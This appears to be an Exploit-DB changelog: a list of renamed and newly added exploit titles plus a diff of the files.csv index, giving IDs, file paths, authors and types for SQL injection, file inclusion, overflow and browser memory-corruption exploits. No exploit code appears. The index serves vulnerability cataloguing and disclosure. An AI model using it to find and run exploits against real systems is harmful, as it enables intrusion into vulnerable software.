DB: 2016-12-11

5 new exploits

uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)
uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)

F5 BIG-IP - Authentication Bypass (1)
F5 BIG-IP - Authentication Bypass (PoC)

Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC

Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)
Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2)
Microsoft Internet Explorer 9 MSHTML - CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)
Microsoft Internet Explorer 9 MSHTML - CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (2)

Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption

uTorrent - DLL Hijacking
uTorrent 2.0.3 - DLL Hijacking

F5 BIG-IP - Authentication Bypass (2)
F5 BIG-IP - Authentication Bypass

SePortal - SQL Injection / Remote Code Execution (Metasploit)
SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)

MyPHP CMS 0.3 - (domain) Remote File Inclusion
MyPHP CMS 0.3 - 'domain' Parameter Remote File Inclusion

RSS-aggregator - 'display.php path' Remote File Inclusion
RSS-aggregator - 'path' Parameter Remote File Inclusion
HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion
HomePH Design 2.10 RC2 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion
HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting

cmreams CMS 1.3.1.1 beta2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting

HoMaP-CMS 0.1 - (index.php go) SQL Injection
HoMaP-CMS 0.1 - 'go' Parameter SQL Injection
Ready2Edit - 'pages.php menuid' SQL Injection
ResearchGuide 0.5 - (guide.php id) SQL Injection
MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection
Ready2Edit - 'menuid' Parameter SQL Injection
ResearchGuide 0.5 - 'id' Parameter SQL Injection
MVC-Web CMS 1.0/1.2 - 'newsid' Parameter SQL Injection
Demo4 CMS - 'index.php id' SQL Injection
Joomla! Component com_facileforms 1.4.4 - Remote File Inclusion
Dagger CMS 2008 - (dir_inc) Remote File Inclusion
TinxCMS 1.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
mm chat 1.5 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
ourvideo CMS 9.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion
Demo4 CMS - 'id' Parameter SQL Injection
Joomla! Component FacileForms 1.4.4 - Remote File Inclusion
Dagger CMS 2008 - 'dir_inc' Parameter Remote File Inclusion
TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting
mm chat 1.5 - Local File Inclusion / Cross-Site Scripting
ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
cmsWorks 2.2 RC4 - 'mod_root' Parameter Remote File Inclusion

Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection
Relative Real Estate Systems 3.0 - 'listing_id' Parameter SQL Injection
DUcalendar 1.0 - (detail.asp iEve) SQL Injection
HiveMaker Directory - 'cid' Parameter SQL Injection
E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection
Link ADS 1 - 'out.php linkid' SQL Injection
TOKOKITA - 'barang.php produk_id' SQL Injection
Webdevindo-CMS 0.1 - (index.php hal) SQL Injection
mUnky 0.0.1 - (index.php zone) Local File Inclusion
Jokes & Funny Pics Script - (sb_jokeid) SQL Injection
DUcalendar 1.0 - 'iEve' Parameter SQL Injection
HiveMaker Directory 1.0.2 - 'cid' Parameter SQL Injection
E-topbiz ViralDX 2.07 - 'bannerid' Parameter SQL Injection
Link ADS 1 - 'linkid' Parameter SQL Injection
TOKOKITA - 'produk_id' Parameter SQL Injection
Webdevindo-CMS 0.1 - 'hal' Parameter SQL Injection
mUnky 0.0.1 - 'zone' Parameter Local File Inclusion
Jokes & Funny Pics Script - 'sb_jokeid' Parameter SQL Injection
MyPHP CMS 0.3.1 - (page.php pid) SQL Injection
PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload
MyPHP CMS 0.3.1 - 'pid' Parameter SQL Injection
PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload
polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection
polypager 1.0rc2 - SQL Injection / Cross-Site Scripting
PHP-Fusion Mod Kroax 4.42 - 'category' Parameter SQL Injection
Riddles Complete Website 1.2.1 - (riddleid) SQL Injection
Tips Complete Website 1.2.0 - (tipid) SQL Injection
Jokes Complete Website 2.1.3 - (jokeid) SQL Injection
Drinks Complete Website 2.1.0 - (drinkid) SQL Injection
Cheats Complete Website 1.1.1 - 'itemID' SQL Injection
Riddles Complete Website 1.2.1 - 'riddleid' Parameter SQL Injection
Tips Complete Website 1.2.0 - 'tipid' Parameter SQL Injection
Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' Parameter SQL Injection
Drinks Complete Website 2.1.0 - 'drinkid' Parameter SQL Injection
Cheats Complete Website 1.1.1 - 'itemID' Parameter SQL Injection

Orca 2.0/2.0.2 - (Parameters.php) Remote File Inclusion
Orca 2.0/2.0.2 - 'Parameters.php' Remote File Inclusion

OTManager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting

SePortal 2.4 - (poll.php poll_id) SQL Injection
SePortal 2.4 - 'poll_id' Parameter SQL Injection
poweraward 1.1.0 rc1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Joomla! Component jabode - 'id' SQL Injection
Online Booking Manager 2.2 - 'id' SQL Injection
poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting
Joomla! Component jabode - 'id' Parameter SQL Injection
Online Booking Manager 2.2 - 'id' Parameter SQL Injection

Joomla! Component Xe webtv - 'id' Blind SQL Injection
Joomla! Component Xe webtv - 'id' Parameter Blind SQL Injection
AcmlmBoard 1.A2 - 'pow' SQL Injection
eSHOP100 - (SUB) SQL Injection
AcmlmBoard 1.A2 - 'pow' Parameter SQL Injection
eSHOP100 - 'SUB' Parameter SQL Injection

OTManager CMS 2.4 - (Tipo) Remote File Inclusion
OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion

Orca 2.0.2 - (Topic) Cross-Site Scripting
Orca 2.0.2 - Cross-Site Scripting

Hedgehog-CMS 1.21 - (Local File Inclusion) Remote Command Execution
Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution

catviz 0.4.0b1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting

Joomla! Component com_facileforms - Cross-Site Scripting
Joomla! Component FacileForms - Cross-Site Scripting

PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload
PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload

Roundcube 1.2.2 - Remote Code Execution

Pivot 1.0 - Remote module_db.php File Inclusion
Pivot 1.0 - 'module_db.php' Remote File Inclusion

MyBloggie 2.1 - 'index.php' year Parameter Cross-Site Scripting
MyBloggie 2.1 - 'index.php' Cross-Site Scripting

E-topbiz Link ADS 1 - 'out.php' SQL Injection

PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting
RSS-aggregator 1.0 - admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection
RSS-aggregator 1.0 - admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection
RSS-aggregator 1.0 - 'admin/fonctions/' Direct Request Administrator Authentication Bypass
RSS-aggregator 1.0 - 'IdFlux' Parameter SQL Injection
RSS-aggregator 1.0 - 'IdTag' Parameter SQL Injection
RSS-aggregator 1.0 - Authentication Bypass
Jokes Complete Website - joke.php id Parameter Cross-Site Scripting
Jokes Complete Website - results.php searchingred Parameter Cross-Site Scripting
Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting
Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting

Splunk Enterprise 6.4.3 - Server-Side Request Forgery

files.csv

@@ -1171,7 +1171,7 @@ id,file,description,date,author,platform,type,port
 9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
 9528,platforms/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",windows,dos,0
 9537,platforms/windows/dos/9537.htm,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",windows,dos,0
-9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0
+9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0
 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,windows,dos,0
 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos,0
 9549,platforms/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",windows,dos,0
@@ -2221,7 +2221,7 @@ id,file,description,date,author,platform,type,port
 19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0
 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0
 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0
-19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
+19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",hardware,dos,0
 19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0
 19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0
 19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0
@@ -3926,7 +3926,7 @@ id,file,description,date,author,platform,type,port
 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)",2014-01-31,"Kees Cook",linux,dos,0
+31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC",2014-01-31,"Kees Cook",linux,dos,0
 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
@@ -4981,7 +4981,7 @@ id,file,description,date,author,platform,type,port
 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
 39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
-39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
+39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
@@ -5282,6 +5282,8 @@ id,file,description,date,author,platform,type,port
 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 - MSHTML 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
 40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0
+40893,platforms/windows/dos/40893.html,"Microsoft Internet Explorer 9 MSHTML - CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)",2016-12-09,Skylined,windows,dos,0
+40894,platforms/windows/dos/40894.html,"Microsoft Internet Explorer 9 MSHTML - CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (2)",2016-12-09,Skylined,windows,dos,0
 40840,platforms/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos,0
 40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
@@ -5297,6 +5299,7 @@ id,file,description,date,author,platform,type,port
 40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
+40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6486,7 +6489,7 @@ id,file,description,date,author,platform,type,port
 14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
-14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
+14748,platforms/windows/local/14748.txt,"uTorrent 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
 14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
 14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
@@ -11244,7 +11247,7 @@ id,file,description,date,author,platform,type,port
 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0
 19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21
 19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21
-19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
+19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
 19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
@@ -14026,7 +14029,7 @@ id,file,description,date,author,platform,type,port
 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0
 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0
 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0
-32621,platforms/php/remote/32621.rb,"SePortal - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,php,remote,80
+32621,platforms/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,php,remote,80
 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0
 32599,platforms/hardware/remote/32599.txt,"Linksys WRT160N - 'apply.cgi' Cross-Site Scripting",2008-11-27,"David Gil",hardware,remote,0
 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak",2014-03-31,neglomaniac,php,remote,0
@@ -16291,7 +16294,7 @@ id,file,description,date,author,platform,type,port
 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0
 1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0
 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0
-1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0
+1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Parameter Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0
 1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0
 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0
 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0
@@ -18990,71 +18993,71 @@ id,file,description,date,author,platform,type,port
 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0
 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0
 5899,platforms/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",php,webapps,0
-5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'display.php path' Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0
+5900,platforms/php/webapps/5900.txt,"RSS-aggregator - 'path' Parameter Remote File Inclusion",2008-06-22,"Ghost Hacker",php,webapps,0
 5901,platforms/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0
-5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0
-5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
+5902,platforms/php/webapps/5902.txt,"HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0
+5903,platforms/php/webapps/5903.txt,"HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps,0
 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0
-5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
+5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,php,webapps,0
 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0
 5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0
-5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) SQL Injection",2008-06-23,SxCx,php,webapps,0
+5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - 'go' Parameter SQL Injection",2008-06-23,SxCx,php,webapps,0
 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation (via SQL Injection)",2008-06-23,Cod3rZ,php,webapps,0
-5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'pages.php menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps,0
-5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - (guide.php id) SQL Injection",2008-06-23,dun,php,webapps,0
-5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0
+5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'menuid' Parameter SQL Injection",2008-06-23,Mr.SQL,php,webapps,0
+5911,platforms/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' Parameter SQL Injection",2008-06-23,dun,php,webapps,0
+5912,platforms/asp/webapps/5912.txt,"MVC-Web CMS 1.0/1.2 - 'newsid' Parameter SQL Injection",2008-06-23,Bl@ckbe@rD,asp,webapps,0
 5913,platforms/php/webapps/5913.txt,"MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0
-5914,platforms/php/webapps/5914.txt,"Demo4 CMS - 'index.php id' SQL Injection",2008-06-23,"CWH Underground",php,webapps,0
-5915,platforms/php/webapps/5915.txt,"Joomla! Component com_facileforms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0
-5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - (dir_inc) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0
-5917,platforms/php/webapps/5917.txt,"TinxCMS 1.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
-5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
-5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
-5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0
+5914,platforms/php/webapps/5914.txt,"Demo4 CMS - 'id' Parameter SQL Injection",2008-06-23,"CWH Underground",php,webapps,0
+5915,platforms/php/webapps/5915.txt,"Joomla! Component FacileForms 1.4.4 - Remote File Inclusion",2008-06-23,Kacak,php,webapps,0
+5916,platforms/php/webapps/5916.txt,"Dagger CMS 2008 - 'dir_inc' Parameter Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0
+5917,platforms/php/webapps/5917.txt,"TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0
+5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0
+5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2008-06-23,CraCkEr,php,webapps,0
+5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - 'mod_root' Parameter Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0
 5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0
 5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0
-5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0
+5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' Parameter SQL Injection",2008-06-24,K-159,php,webapps,0
 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0
-5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0
-5928,platforms/php/webapps/5928.txt,"HiveMaker Directory - 'cid' Parameter SQL Injection",2008-06-24,"security fears team",php,webapps,0
-5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0
-5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'out.php linkid' SQL Injection",2008-06-24,"Hussin X",php,webapps,0
-5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'barang.php produk_id' SQL Injection",2008-06-24,k1tk4t,php,webapps,0
-5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
-5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0
-5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0
+5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - 'iEve' Parameter SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0
